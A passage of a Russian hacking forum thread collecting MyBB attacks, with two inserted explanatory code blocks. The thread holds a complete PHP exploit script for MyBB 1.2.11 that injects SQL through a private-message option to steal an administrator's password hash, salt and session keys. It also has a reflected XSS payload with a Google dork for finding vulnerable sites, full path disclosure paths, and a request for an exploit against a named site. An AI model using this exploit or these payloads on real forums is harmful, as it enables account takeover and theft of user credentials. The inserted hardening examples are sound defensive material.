    //        to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
    //    
    // greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
    // and http://expdb.cc/?op=expdb (welcome to our priv8 exploits shop, greetz to all it's members)*
    // 25.01.08

    error_reporting(0);
    @ini_set("max_execution_time",0);
    @ini_set('output_buffering',0);
    @set_magic_quotes_runtime(0);
    @set_time_limit(0);
    @ob_implicit_flush(1);

    header("Content-Type: text/html; charset=utf-8\r\n");
    header("Pragma: no-cache");

    ?>

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>mybb 1.2.11 xek</title>
    <style>
    <!--
    A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
    A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
    A:active {COLOR: #228B22; TEXT-DECORATION: none}
    A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
    BODY
    {
        margin="5";
        FONT-WEIGHT: normal; 
        COLOR: #B9B9BD; 
        BACKGROUND: #44474F; 
        FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; 
    }

    -->
    </style>
    </head>
    <body>

    <?php

    function myflush($timee)
    {
        if(ob_get_contents())
        {
            ob_flush();
            ob_clean();
            flush();
            usleep($timee);
        }
    }

    if (!$_GET)
    {
        echo '<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
        <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value=" get admin passwd... "><br><br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
        <font color="#B9B9BD"> ¬ for expamle "expdb.cc"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
        <font color="#B9B9BD"> ¬ patch 2 mybb forum, for expamle "community/mybb"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
        <font color="#B9B9BD"> ¬ you username on this forum, for expamle "c411k"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
        <font color="#B9B9BD"> ¬ you password, for expamle "h1world"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
        <font color="#B9B9BD"> ¬ admin id, default 1<br>
        </form>';
    }


    if (isset($_GET['fuck_mybb']))
    {
    $username = ($_POST['username']);
    $pwd = ($_POST['pwd']);
    $host_mybb = ($_POST['hostname']);
    $patch_mybb = ($_POST['patch']);
    $uid_needed = ($_POST['uid_needed']);
    $login_mybb = 'member.php';
    $pm_mybb = 'private.php';
    $data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';

    function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
    {
        global $send_http;
        $s = array();
        $url = fsockopen($host, 80);
        $send_http  = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
        $send_http .= "Host: $host\r\n";
        $send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
        $send_http .= "Cookie: $cook1e\r\n";
        $send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
        $send_http .= "Connection: Close\r\n\r\n";
        if ($method === 'POST')
        {
            $send_http .= $data_gp;
        }
        //print_r($send_http);
        fputs($url, $send_http);
        while (!feof($url)) $s[] = fgets($url, 1028);
        fclose($url);
        return $s;
    }

    echo '<pre>- start....';
    myflush(50000);

    $get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
    echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';
    myflush(50000);

    foreach ($get_cookie as $value)
    {
        if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
        {
            $value = explode(";", $value);
            $cookie = strstr($value[0], 'mybbuser');
            break;
        }
    }
    echo 
    '<pre>- cookie: '.$cookie;
    myflush(50000);

    preg_match("/mybbuser=(.*)_/"$cookie$m);
    $get_uid $m[1];
    echo 
    '<pre>- user id: '.$get_uid;
    myflush(50000);

    $data_expl "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
    sendd($host_mybb$patch_mybb$pm_mybb'POST'$data_expl$cookie);
    echo 
    '<pre>- send exploit:
    -------------------
    '
    .$send_http.'
    -------------------
    look you private messages 4 admin passwd hash <a href=http://'
    .$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
    }


    ?>

    </body>
    </html>
     
    _________________________
    3 people like this.
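The root cause behind the script above is that a private-message option flag (`options[disablesmilies]`) reached the INSERT statement as raw text. The following is an added illustration, not MyBB's own private.php (the thread does not quote it) and not the real table layout, which is reduced to three columns here: the interpolating pattern next to its hardened form, run against a constructed tampered flag so the difference in the resulting statement is visible.

```php
<?php
declare(strict_types=1);

// Added illustration (not MyBB code): a PM option flag is user input and must be
// reduced to exactly 0 or 1 before it can influence a query. Column names are a
// simplified stand-in for the real mybb_privatemessages table.

// Vulnerable pattern: the flag is interpolated into the statement text. Even when
// the message body is escaped, a flag that is not 0/1 can close the VALUES tuple,
// open a second one and comment out the tail of the original statement.
function build_pm_insert_unsafe(int $uid, string $message, array $options): string
{
    $smilieoff = $options['disablesmilies'] ?? '0';
    return "INSERT INTO mybb_privatemessages (uid, message, smilieoff) "
         . "VALUES ($uid, '" . addslashes($message) . "', '$smilieoff')";
}

// Hardened pattern: the flag is coerced to 0 or 1 and every value travels as a
// bound parameter, so the statement text is fixed at development time.
function build_pm_insert_safe(int $uid, string $message, array $options): array
{
    $smilieoff = (($options['disablesmilies'] ?? '0') === '1') ? 1 : 0;
    return [
        'sql'    => 'INSERT INTO mybb_privatemessages (uid, message, smilieoff) VALUES (?, ?, ?)',
        'params' => [$uid, $message, $smilieoff],
    ];
}

// Number of tuple separators "),(" in a built statement. A single PM insert
// must contain none; anything above zero means user input rewrote the query.
function count_extra_value_tuples(string $sql): int
{
    return (int) preg_match_all('/\)\s*,\s*\(/', $sql);
}

// Constructed input: a flag that is not 0/1 but a quote, a second tuple and an
// opening comment that swallows the rest of the template.
$tampered = ['disablesmilies' => "'),(1,'injected','1')/*"];

$unsafe = build_pm_insert_unsafe(7, 'hello', $tampered);
$safe   = build_pm_insert_safe(7, 'hello', $tampered);

printf("unsafe extra tuples: %d\n%s\n\n", count_extra_value_tuples($unsafe), $unsafe);
printf("safe   extra tuples: %d\n%s\nparams: %s\n",
    count_extra_value_tuples($safe['sql']), $safe['sql'], json_encode($safe['params']));
```

With the tampered flag the unsafe builder yields one extra tuple (the statement now inserts two rows, and the comment hides the original closing quote and parenthesis), while the safe builder reports zero and carries `0` in its parameter list. To execute the hardened form, hand `sql` and `params` to a prepared statement (`$pdo->prepare($safe['sql'])->execute($safe['params'])`); the whitelist on the flag is what matters even for drivers that escape strings, because a flag column is never meant to hold arbitrary text.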
  16. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Full path disclosure MyBB 1.4.x

    Code:
    /admin/modules/config/smilies.php
    /inc/class_custommoderation.php
    /inc/3rdparty/diff/Diff3.php
    /inc/3rdparty/diff/Diff/Renderer/inline.php
    /inc/3rdparty/diff/Diff/Renderer/unified.php
    /inc/tasks/massmail.php
    
     
  17. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    MyBB (FWS Mod) reflected XSS

    Mod Name: Forum Warning System (http://community.mybboard.net/attachment.php?aid=6814)

    Vulnerable piece of code:
    Code:
    //USERCP AND PM CHANGES 
    elseif($file == "usercp.php" || $file == "private.php") 
    { 
     if(function_exists("imagecreatefrompng") && $mybb->user['fws_warnings'] != 0) 
     { 
      if($mybb->user['fws_warnings'] <= 14 && $mybb->user['fws_warnings'] > 0) $addition = " ".fws_warning_colour($mybb->user['fws_warnings']."%"); 
      $fws_current_w_level = '<img src="fws.php?action=image&wl='.$mybb->user['fws_warnings'].'" alt="'.$mybb->user['fws_warnings'].'%" title="'.$mybb->user['fws_warnings'].'%" border="0" />'.$addition; 
     } 
     
    Example: http://mybboard.it/forum/fws.php?action=image&wl=/\<sCRIPT>alert("xss")</sCRIPT>\

    Google dork: inurl:fws.php; "MyBB" inurl:fws.php

    http://securityvulns.ru/Vdocument379.html
     
    _________________________
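The `wl` value in the example URL is a query-string parameter that ends up in the response body. As an added example (not the FWS mod's fws.php, whose response shape and percentage range of 0..100 are assumptions here), the reflecting pattern is shown beside a version that validates the parameter as an integer and escapes whatever it reflects, including the rejection message:

```php
<?php
declare(strict_types=1);

// Added illustration (not the FWS mod's code): the warning level "wl" comes from
// the query string and is reflected into HTML, so it must be validated as a
// number and escaped on output. The error-message layout is an assumption.

// Vulnerable pattern: the raw parameter goes straight into the response body,
// both in the rejection message and in the attributes of the <img> tag.
function warning_image_unsafe(array $get): string
{
    $wl = $get['wl'] ?? '';
    if (!is_numeric($wl)) {
        return "<p>Invalid warning level: $wl</p>";   // reflected as-is
    }
    return '<img src="fws.php?action=image&wl=' . $wl . '" alt="' . $wl . '%" />';
}

// Hardened pattern: accept only an integer within the range the mod works with
// (assumed 0..100), and escape anything that is reflected. ENT_QUOTES covers
// both text and attribute context.
function warning_image_safe(array $get): string
{
    $raw = (string) ($get['wl'] ?? '');
    if (!preg_match('/^\d{1,3}$/', $raw) || (int) $raw > 100) {
        return '<p>Invalid warning level: '
             . htmlspecialchars($raw, ENT_QUOTES, 'UTF-8') . '</p>';
    }
    $wl = (int) $raw;   // from here on only an integer can reach the markup
    return '<img src="fws.php?action=image&amp;wl=' . $wl . '" alt="' . $wl . '%" />';
}

// Constructed input with the same shape as the probe quoted in the post above.
$probe = ['wl' => '/\<sCRIPT>alert("xss")</sCRIPT>\\'];

echo warning_image_unsafe($probe), "\n";        // script element survives intact
echo warning_image_safe($probe), "\n";          // rendered as escaped text
echo warning_image_safe(['wl' => '42']), "\n";  // normal case
```

The regular-expression check is deliberately stricter than `is_numeric()`, which also accepts signs, decimals and exponent notation; casting to `int` after the check means the value that reaches the markup can only ever be a small integer.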
  18. SEKTOR3A

    SEKTOR3A New Member

    Joined:
    2 May 2009
    Messages:
    36
    Likes Received:
    1
    Reputations:
    0
    xss

    Hi everyone, I found an XSS on mybb2.ru, here is a video I recorded http://narod.ru/disk/8621473000/xss_forum_mybb2.rar.html , please suggest some kind of exploit for it

    xss
    href="viewtopic.php?t=1529&amp;start=0&amp;postdays=0&amp;postorder=asc&amp;highlight="
     
    #19 SEKTOR3A, 18 May 2009
    Last edited: 18 May 2009
  19. Nelzone

    Nelzone Banned

    Joined:
    12 Apr 2008
    Messages:
    172
    Likes Received:
    134
    Reputations:
    6
    MyBB 1.4.6 3 May 2009

    Admin panel access

    The vulnerability exists due to insufficient handling of input data in the URL

    XSS can be placed in Categories & Forums

    Solution: http://mybboard.it/forum/thread-3623.html
     
    #20 Nelzone, 25 May 2009
    Last edited: 2 Jul 2009
    2 people like this.